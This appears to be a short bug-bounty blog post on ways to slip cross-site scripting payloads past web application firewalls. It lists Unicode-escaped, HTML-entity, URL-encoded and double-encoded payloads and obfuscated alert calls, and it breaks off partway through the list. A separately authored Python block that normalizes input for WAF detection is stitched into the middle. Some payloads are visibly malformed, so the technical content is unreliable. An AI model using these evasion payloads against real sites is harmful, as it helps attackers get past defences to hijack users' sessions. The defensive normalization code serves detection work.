Beyond Simple Alerts: Techniques for Evading WAF and Achieving XSS Success

Lopseg
2 min read, Dec 22, 2023

TL;DR
If you're looking for ready-made payloads, skip to the end of this blog post, where I include some interesting ones.

Using Encoding to Bypass String Checks

To bypass common string checks, you can use Unicode escape sequences (\uXXXX) inside JSON objects. The escaped form hides the payload from signature rules that only match the literal string, so the WAF does not recognize it.

Example:

JavaScript:\u000aalert('Test')

HTML Encoding in XSS Payloads

Example:

<s&#x61;lert('XSS');</script>

URL Encoding to Bypass WAFs

Example:

GET /vulnerable?param=%61lert(%22%22)

Double URL Encoding to Confuse WAFs

Example:

%253Cscript%253Ealert(%2527XSS%2527)%253C/script%253E
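The four encodings above all defeat the same thing: a rule that matches the raw request bytes. The added example below (mine, not from this post) shows the defensive counterpart, a bounded normalization pass that URL-decodes, HTML-entity-decodes and resolves JavaScript \uXXXX/\xXX escapes until the input stops changing, and then applies the same signatures to the raw and the normalized value. The sample inputs are the payloads quoted above; the signature names and the three-round limit are my own assumptions.

```python
import html
import re
from urllib.parse import unquote

# Constructed samples: the encoded payloads quoted earlier in this post, not live traffic.
SAMPLES = {
    "unicode_js": "JavaScript:\\u000aalert('Test')",
    "html_entity": "<s&#x61;lert('XSS');</script>",
    "url_encoded": "/vulnerable?param=%61lert(%22%22)",
    "double_url": "%253Cscript%253Ealert(%2527XSS%2527)%253C/script%253E",
}

# Illustrative signatures (assumed names). Note the \b on alert_call: in the raw
# "unicode_js" sample the literal text "\u000a" glues onto "alert", so no word
# boundary exists until the escape has been decoded into a newline.
SIGNATURES = {
    "script_tag": re.compile(r"<script\b", re.IGNORECASE),
    "js_uri_alert": re.compile(r"javascript:\s*alert", re.IGNORECASE),
    "alert_call": re.compile(r"\balert\s*\(", re.IGNORECASE),
}

_JS_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})")
MAX_DECODE_ROUNDS = 3  # assumed bound; stops an attacker forcing unbounded decode loops


def _js_unescape(value: str) -> str:
    """Resolve JavaScript \\uXXXX and \\xXX escapes into the characters they encode."""
    return _JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), value)


def normalize(value: str, rounds: int = MAX_DECODE_ROUNDS) -> str:
    """Apply URL, HTML-entity and JS-escape decoding until the value is stable.

    Double URL encoding needs two passes; the third pass confirms nothing changed.
    """
    for _ in range(rounds):
        decoded = _js_unescape(html.unescape(unquote(value)))
        if decoded == value:
            break
        value = decoded
    return value


def matches(value: str) -> set:
    """Return the names of the signatures that fire on the given (raw or normalized) value."""
    return {name for name, pattern in SIGNATURES.items() if pattern.search(value)}
```

Running `matches()` on each raw sample returns an empty set, while `matches(normalize(sample))` fires on the double-URL, URL-encoded and Unicode-escape samples; the entity sample decodes to `<salert('XSS');</script>`, which is why entity decoding alone is not enough without the surrounding context.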

Stop Using Just "alert()"

1. Using Constructors and Prototype:

new Function('al' + 'ert')(1)

2. Regular Expression and String Match:

/al/.source+/ert/.source/['split'](/a/).join('')(1)

3. Creating…

Written by Lopseg

Bachelor of Engineering in Computer Engineering, dedicated to exploring the depths of cybersecurity. Security researcher and avid bug bounty participant.